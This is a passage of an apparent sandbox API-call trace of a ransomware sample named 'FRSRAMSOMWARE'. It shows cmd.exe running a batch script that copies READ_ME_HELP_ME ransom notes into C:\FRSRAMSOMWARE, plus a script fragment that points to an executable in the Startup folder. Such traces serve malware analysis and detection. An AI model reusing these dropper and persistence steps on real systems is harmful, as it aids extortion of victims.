(_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.199] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.199] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\read_me_help_me.png")) returned 0x20 [0037.199] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0xcf0000 [0037.199] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png", fInfoLevelId=0x1, lpFindFileData=0xd1bc00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd1bc00) returned 0xd27138 [0037.199] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png", lpFilePart=0x0) returned 0x24 [0037.199] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png", _String2="con") returned -53 [0037.199] CreateFileW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\read_me_help_me.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e284, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x8c [0037.199] _open_osfhandle (_OSFileHandle=0x8c, _Flags=8) returned 3 [0037.200] _get_osfhandle (_FileHandle=3) returned 0x8c [0037.200] GetFileType (hFile=0x8c) returned 0x1 [0037.200] SetErrorMode (uMode=0x0) returned 0x0 [0037.200] SetErrorMode (uMode=0x1) returned 0x0 [0037.200] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png", nBufferLength=0x208, lpBuffer=0xc8e728, lpFilePart=0xc8e294 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png", lpFilePart=0xc8e294*="READ_ME_HELP_ME.png") returned 0x43 [0037.200] SetErrorMode (uMode=0x0) returned 0x1 [0037.200] ReadFile (in: hFile=0x8c, lpBuffer=0xcf0000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e2b8, lpOverlapped=0x0 | out: lpBuffer=0xcf0000*, lpNumberOfBytesRead=0xc8e2b8*=0x200, lpOverlapped=0x0) returned 1 [0037.200] SetErrorMode (uMode=0x0) returned 0x0 [0037.200] SetErrorMode (uMode=0x1) returned 0x0 [0037.200] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png", lpFilePart=0xc8de64*="READ_ME_HELP_ME.png") returned 0x24 [0037.200] SetErrorMode (uMode=0x0) returned 0x1 [0037.200] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png", _String2="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png") returned 15 [0037.200] GetFileAttributesW (lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png" (normalized: "c:\\frsramsomware\\read_me_help_me.png")) returned 0xffffffff [0037.200] GetLastError () returned 0x2 [0037.200] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png", lpFilePart=0x0) returned 0x24 [0037.200] SetErrorMode (uMode=0x0) returned 0x0 [0037.200] SetErrorMode (uMode=0x1) returned 0x0 [0037.200] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png", lpFilePart=0xc8de64*="READ_ME_HELP_ME.png") returned 0x24 [0037.200] SetErrorMode (uMode=0x0) returned 0x1 [0037.200] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png", _String2="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png") returned 15 [0037.200] GetFileAttributesW (lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png" (normalized: "c:\\frsramsomware\\read_me_help_me.png")) returned 0xffffffff [0037.200] CopyFileExW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\read_me_help_me.png"), lpNewFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png" (normalized: "c:\\frsramsomware\\read_me_help_me.png"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x12b5164, dwCopyFlags=0x0) returned 1 [0037.204] GetFileAttributesW (lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png" (normalized: "c:\\frsramsomware\\read_me_help_me.png")) returned 0x20 [0037.204] SetFileAttributesW (lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png", dwFileAttributes=0x20) returned 1 [0037.205] _close (_FileHandle=3) returned 0 [0037.205] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.205] GetFileType (hFile=0xffffffff) returned 0x0 [0037.205] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.205] SetFileTime (hFile=0xffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0xc8e310) returned 0 [0037.205] FindNextFileW (in: hFindFile=0xd27138, lpFindFileData=0xd1bc00 | out: lpFindFileData=0xd1bc00) returned 0 [0037.205] GetLastError () returned 0x12 [0037.205] FindClose (in: hFindFile=0xd27138 | out: hFindFile=0xd27138) returned 1 [0037.205] _vsnwprintf (in: _Buffer=0x12d0890, _BufferCount=0x103, _Format="%9d", _ArgList=0xc8ed44 | out: _Buffer=" 1") returned 9 [0037.205] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.205] GetFileType (hFile=0x28) returned 0x2 [0037.205] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0037.205] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8ecb8 | out: lpMode=0xc8ecb8) returned 1 [0037.205] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.205] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x28, lpConsoleScreenBufferInfo=0xc8ed08 | out: lpConsoleScreenBufferInfo=0xc8ed08) returned 1 [0037.205] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0037.205] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8ed38 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0037.205] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0xc8ecec, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8ecec*=0x1b) returned 1 [0037.206] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0xc8ed58, ProcessInformationLength=0x4) returned 0x0 [0037.206] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.206] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0037.206] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.206] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0037.207] _get_osfhandle (_FileHandle=0) returned 0x24 [0037.207] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0037.207] SetConsoleInputExeNameW () returned 0x1 [0037.207] GetConsoleOutputCP () returned 0x1b5 [0037.207] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0037.207] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.207] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0037.207] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0037.207] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.207] SetFilePointer (in: hFile=0x80, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0037.208] VirtualFree (lpAddress=0xcf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.208] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0037.208] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x24f, lpOverlapped=0x0) returned 1 [0037.208] SetFilePointer (in: hFile=0x80, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0037.208] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0037.208] GetFileType (hFile=0x80) returned 0x1 [0037.208] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.208] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0037.208] GetEnvironmentVariableW (in: lpName="MYFILES", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F") returned 0x2f [0037.209] _tell (_FileHandle=3) returned 2152 [0037.209] _close (_FileHandle=3) returned 0 [0037.209] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0037.209] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0037.209] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0037.209] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0037.209] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0037.209] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0037.210] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.210] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.210] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.210] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.211] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.211] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\read_me_help_me.txt")) returned 0x20 [0037.211] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0xcf0000 [0037.211] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt", fInfoLevelId=0x1, lpFindFileData=0xd1bc00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd1bc00) returned 0xd27138 [0037.212] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt", lpFilePart=0x0) returned 0x24 [0037.212] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt", _String2="con") returned -53 [0037.212] CreateFileW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\read_me_help_me.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e284, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x8c [0037.212] _open_osfhandle (_OSFileHandle=0x8c, _Flags=8) returned 3 [0037.212] _get_osfhandle (_FileHandle=3) returned 0x8c [0037.212] GetFileType (hFile=0x8c) returned 0x1 [0037.212] SetErrorMode (uMode=0x0) returned 0x0 [0037.212] SetErrorMode (uMode=0x1) returned 0x0 [0037.212] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt", nBufferLength=0x208, lpBuffer=0xc8e728, lpFilePart=0xc8e294 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt", lpFilePart=0xc8e294*="READ_ME_HELP_ME.txt") returned 0x43 [0037.212] SetErrorMode (uMode=0x0) returned 0x1 [0037.212] ReadFile (in: hFile=0x8c, lpBuffer=0xcf0000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e2b8, lpOverlapped=0x0 | out: lpBuffer=0xcf0000*, lpNumberOfBytesRead=0xc8e2b8*=0x200, lpOverlapped=0x0) returned 1 [0037.212] SetErrorMode (uMode=0x0) returned 0x0 [0037.212] SetErrorMode (uMode=0x1) returned 0x0 [0037.212] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt", lpFilePart=0xc8de64*="READ_ME_HELP_ME.txt") returned 0x24 [0037.212] SetErrorMode (uMode=0x0) returned 0x1 [0037.212] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt", _String2="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt") returned 15 [0037.212] GetFileAttributesW (lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt" (normalized: "c:\\frsramsomware\\read_me_help_me.txt")) returned 0xffffffff [0037.212] GetLastError () returned 0x2 [0037.212] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt", lpFilePart=0x0) returned 0x24 [0037.212] SetErrorMode (uMode=0x0) returned 0x0 [0037.212] SetErrorMode (uMode=0x1) returned 0x0 [0037.212] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt", lpFilePart=0xc8de64*="READ_ME_HELP_ME.txt") returned 0x24 [0037.212] SetErrorMode (uMode=0x0) returned 0x1 [0037.212] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt", _String2="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt") returned 15 [0037.212] GetFileAttributesW (lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt" (normalized: "c:\\frsramsomware\\read_me_help_me.txt")) returned 0xffffffff [0037.212] CopyFileExW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\read_me_help_me.txt"), lpNewFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt" (normalized: "c:\\frsramsomware\\read_me_help_me.txt"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x12b5164, dwCopyFlags=0x0) returned 1 [0037.215] GetFileAttributesW (lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt" (normalized: "c:\\frsramsomware\\read_me_help_me.txt")) returned 0x20 [0037.215] SetFileAttributesW 